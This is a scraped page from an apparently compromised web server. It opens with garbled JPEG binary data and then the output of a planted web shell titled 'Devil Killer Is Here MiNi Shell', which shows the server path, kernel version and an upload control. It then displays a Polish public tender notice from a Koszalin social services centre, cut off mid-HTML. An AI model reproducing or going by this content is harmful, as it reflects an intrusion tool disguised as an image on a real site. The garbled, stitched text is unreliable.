JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220722/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220722/0027317501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Działania aklimatyzacyjne i integracyjne dla dzieci, młodzieży i osób dorosłych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG SPOŁECZNYCH W KOSZALINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003801829</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Monte Cassino 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">75-412</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kontrola@cuskoszalin.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://cus.koszalin.ibip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Działania aklimatyzacyjne i integracyjne dla dzieci, młodzieży i osób dorosłych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dcf0c805-09a3-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00273175</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00328004/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Działania aklimatyzacyjne i integracyjne dla dzieci, młodzieży i dorosłych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadania 1 - 3 będą realizowane w ramach projektu “Gmina Miasto Koszalin – PomagaMY Ukrainie ” współfinans. ze środków EFS w ramach RPWZ na lata 2014-2020,. Zadanie 4 będzie realizowane w ramach projektu “Regionalna Akademia Dzieci i Młodzieży” współfinansowanego ze środków EFS w ramach Regionalnego Programu Województwa Zachodniopomorskiego na lata 2014-2020. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Informacje o środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie komunikował się z Wykonawcami:<br/>1)	z zastrzeżeniem art. 61 ust. 2 ustawy, w postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ oraz ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal <br/>2)	korespondencja przekazana Zamawiającemu w inny sposób (np. listownie, mailem) nie będzie brana pod uwagę.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej.<br/>1)	ofertę i oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, składa się, pod rygorem nieważności w formie elektronicznej (tj. przy użyciu kwalifikowanego podpisu elektronicznego) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym (zaawansowany podpis elektroniczny);<br/>2)	podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy i wymagane zapisami SWZ składa się w formie elektronicznej (tj. przy użyciu kwalifikowanego podpisu elektronicznego) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym;<br/>3)	sposób sporządzenia podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów <br/>lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy;<br/>4)	jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 z późn. zm.), Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi jawną część należy ten plik zaszyfrować;<br/>5)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. <br/><br/>Pozostałe informacje w Rozdziale II SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 RODO, Zamawiający informuje, że: <br/>1)	administratorem a w przypadku zamówień współfinansowanych ze środków UE (jeżeli dotyczy) również podmiotem przetwarzającym wszelkie dane osobowe osób fizycznych związanych z niniejszym postępowaniem jest <br/>Centrum Usług Społecznych w Koszalinie <br/>z siedzibą przy al. Monte Cassino 2 w Koszalinie <br/>adres e-mail: sekretariat@cuskoszalin.eu <br/>tel. 94 316 03 00 <br/>2)	kontakt do inspektora ochrony danych osobowych w Centrum Usług Społecznych w Koszalinie: <br/>- adres korespondencyjny: al. Monte Cassino 2, 75-412 Koszalin <br/>- adres e-mail: iod@cuskoszalin.eu <br/>3)	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie niniejszego zamówienia, publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji,<br/>4)	odbiorcami ww. danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych oraz umowy dofinansowania (jeżeli dotyczy). Dane osobowe mogą być przekazywane podmiotom, które przetwarzają dane osobowe na zlecenie administratora, na podstawie zawartej umowy powierzenia przetwarzania danych osobowych, m.in. firmy świadczące usługi w zakresie oprogramowania. <br/>5)	ww. dane osobowe będą przechowywane odpowiednio:<br/>- przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego albo przez cały okres obowiązywania umowy w sprawie zamówienia publicznego - jeżeli okres obowiązywania umowy przekracza 4 lata; <br/>- przez okres, o którym mowa w art. 125 ust. 4 lit. d) w zw. z art. 140 rozporządzenia Parlamentu Europejskiego nr 1303/2013 z dnia 17.12.2013 r. w przypadku zamówień współfinansowanych ze środków UE;<br/>- do czasu przeprowadzania archiwizacji dokumentacji - w zakresie określonym <br/>w przepisach o archiwizacji, <br/>6)	obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy.<br/><br/>Pozostałe informacje w Rozdziale IV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZK.260.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1: Warsztaty aklimatyzacyjne dla dzieci i młodzieży w formie stacjonarnej i wyjazdowej.<br/>Szczegółowy opis przedmiotu zamówienia na Zadanie 1 wraz z dokumentami wymaganymi przy realizacji zamówienia znajduje się w Załączniku nr 7a do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Kryterium I - Cena<br/><br/>Oferty oceniane będą na podstawie ceny, podanej przez Wykonawcę w formularzu ofertowym i obliczane według następującego wzoru:<br/>	<br/> P = Cn : Cb x 100 pkt x Wg<br/>gdzie :<br/>- P	- oznacza liczbę punktów przyznanych badanej ofercie<br/>- Cn	- oznacza cenę ofertową brutto oferty najtańszej<br/>- Cb	- oznacza cenę ofertową brutto badanej oferty<br/>- Wg	- oznacza wagę kryterium (w %) = Wg<br/>Wykonawca może uzyskać w tym kryterium maksymalnie 60 punktów.<br/><br/>b) Kryterium II - Znajomość języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia<br/><br/>Kryterium „Znajomość języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia” będzie rozpatrywane na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty dotyczącego znajomości języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia. Pedagog będzie prowadził warsztaty. Znajomość języka ukraińskiego jest rozumiana jako znajomość tego języka na poziomie umożliwiającym przeprowadzenia warsztatów stanowiących przedmiot zamówienia w języku ukraińskim. Podstawą tej znajomości może być ukończony kurs językowy, sytuacja, gdy język ukraiński jest językiem ojczystym lub inna podstawa umożliwiająca przeprowadzenie warsztatów stanowiących przedmiot zamówienia w języku ukraińskim.<br/><br/>W tym kryterium można uzyskać maksymalnie 30 punktów.<br/><br/>Liczba punktów w tym kryterium zostanie przyznana w następujący sposób:<br/>- jeżeli Wykonawca zadeklaruje znajomość języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia i wskaże podstawę znajomości języka ukraińskiego – 30 punktów,<br/>- brak zadeklarowania znajomości języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia - 0 punktów.<br/><br/>Zamawiający informuje, iż w sytuacji w której Wykonawca nie zaznaczy żadnego z kwadratów lub zaznaczy więcej niż jeden kwadrat w formularzu ofertowym dot. znajomości języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia, Zamawiający do oceny oferty, przyjmie, że Wykonawca przy wykonywaniu zamówienia nie skieruje pedagoga ze znajomością języka ukraińskiego a w Kryterium „Znajomość języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia” otrzyma 0 punktów.<br/>Deklaracja Wykonawcy o znajomości języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia będzie oznaczała, że znajomość języka ukraińskiego posiada każdy z pedagogów prowadzących warsztaty i wskazanych przez Wykonawcę zarówno w formularzu oferty jak i w Wykazie osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego.<br/><br/>Uwaga<br/>Przed przyznaniem punktów w powyższym kryterium, Zamawiający na podstawie złożonego wraz z ofertą wykazu osób, najpierw dokona weryfikacji spełniania warunku udziału w postępowaniu. Jeżeli wskazane kwalifikacje i doświadczenie nie potwierdzą spełniania warunku przez osobę skierowaną do realizacji zamówienia Zamawiający na podstawie art. 128 ust. 1 ustawy wezwie Wykonawcę do uzupełnienia wykazu.<br/>Jeżeli w ramach uzupełnienia Wykonawca wskaże nową osobę spełniającą warunek udziału w postępowaniu (inną niż wskazał wcześniej w formularzu ofertowym), Zamawiający uzna, że Wykonawca wykazał spełnienie warunku udziału w postępowaniu, ale nie przyzna dodatkowych punktów w kryterium oceny ofert „Znajomość języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia”.<br/>Jeżeli Wykonawca uzyska punkty w kryterium „Znajomość języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia”, osoba ta, z zastrzeżeniem zapisów umowy, zobowiązana jest uczestniczyć w wykonaniu zamówienia.<br/><br/>c) Kryterium III - Aspekt społeczny - zatrudnienie osób niepełnosprawnych do realizacji zamówienia <br/><br/>Kryterium „Aspekt społeczny - zatrudnienie osób niepełnosprawnych do realizacji zamówienia” będzie rozpatrywane na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty dotyczącego zatrudnienia osób niepełnosprawnych do realizacji zamówienia. <br/><br/><br/>Pozostałe informacje w Rozdziale XIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Znajomość języka ukraińskiego przez pedagoga skierowanego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny – zatrudnienie osób niepełnosprawnych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2: Gra edukacyjna/terenowa.<br/>Szczegółowy opis przedmiotu zamówienia na Zadanie 2 wraz z dokumentami wymaganymi przy realizacji zamówienia znajduje się w Załączniku nr 7b do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37524100-8 - Gry edukacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Kryterium I - Cena<br/><br/>Oferty oceniane będą na podstawie ceny, podanej przez Wykonawcę w formularzu ofertowym i obliczane według następującego wzoru: <br/> <br/> P = Cn : Cb x 100 pkt x Wg<br/>gdzie :<br/>- P	- oznacza liczbę punktów przyznanych badanej ofercie<br/>- Cn	- oznacza cenę ofertową brutto oferty najtańszej<br/>- Cb	- oznacza cenę ofertową brutto badanej oferty<br/>- Wg	- oznacza wagę kryterium (w %) = Wg<br/><br/>Wykonawca może uzyskać w tym kryterium maksymalnie 60 punktów.<br/><br/>b) Kryterium II - Koncepcja gry edukacyjnej/terenowej<br/><br/>Ocena kryterium będzie polegała na weryfikacji koncepcji wykonania jednej gry edukacyjnej/terenowej przedłożonej przez Wykonawcę w formularzu oferty. Zamawiający oceni jedną koncepcję przedstawioną przez Wykonawcę w ofercie. W przypadku przedłożenia kilku koncepcji ocenie będzie podlegała pierwsza z nich wskazana w formularzu oferty.<br/>Każdy członek komisji przetargowej indywidualnie oceni Koncepcję gry edukacyjnej/terenowej, z uwzględnieniem rodzaju, czasu trwania, wartości merytorycznej i kreatywnych rozwiązań i przyzna:<br/>10 pkt. jeśli koncepcja będzie spełniać w stopniu dostatecznym założony cel, rodzaj gry;<br/>20 pkt. jeśli koncepcja będzie spełniać w stopniu dobrym założony cel, rodzaj gry i będzie zawierać kreatywne rozwiązania<br/>30 pkt. jeśli koncepcja będzie spełniać w stopniu optymalnym założony cel, rodzaj gry i będzie zawierać kreatywne rozwiązania. <br/>Punkty w kryterium „Koncepcja gry edukacyjnej/terenowej” zostaną przyznane przez każdego członka komisji przetargowej dokonującego oceny poszczególnych ofert podlegających ocenie a następnie zostaną zsumowane i podzielone przez liczbę członków komisji przetargowej biorących udział w ocenie ofert. <br/>Wykonawca może uzyskać w tym kryterium maksymalnie 30 punktów.<br/>Zamawiający informuje, iż w sytuacji w której Wykonawca nie wypełni w formularzu ofertowym punktu dotyczącego Koncepcji gry edukacyjnej/terenowej, oferta otrzyma <br/>0 punktów.<br/><br/>c) Kryterium III - Aspekt społeczny – zatrudnienie osób niepełnosprawnych <br/>do realizacji zamówienia<br/><br/>Kryterium „Aspekt społeczny - zatrudnienie osób niepełnosprawnych do realizacji zamówienia” będzie rozpatrywane na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty dotyczącego zatrudnienia osób niepełnosprawnych do realizacji zamówienia. <br/>W tym kryterium można uzyskać maksymalnie 10 punktów.<br/>Liczba punktów w tym kryterium zostanie przyznana w następujący sposób:<br/>- jeżeli zadeklarowana przez Wykonawcę liczba zatrudnionych osób niepełnosprawnych do realizacji zamówienia to co najmniej 1 osoba – 10 punktów,<br/>- brak zadeklarowania zatrudnienia przez Wykonawcę osób niepełnosprawnych do realizacji zamówienia - 0 punktów.<br/><br/>Zamawiający informuje, iż w sytuacji w której Wykonawca nie zaznaczy żadnego z kwadratów lub zaznaczy więcej niż jeden kwadrat w formularzu ofertowym dot. zadeklarowanej liczby osób, Zamawiający do oceny oferty, przyjmie, że Wykonawca do realizacji zamówienia nie zatrudni osób niepełnosprawnych a w Kryterium „Aspekt społeczny - zatrudnienie osób niepełnosprawnych do realizacji zamówienia” otrzyma 0 punktów.<br/><br/>Pozostałe informacje w Rozdziale XIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 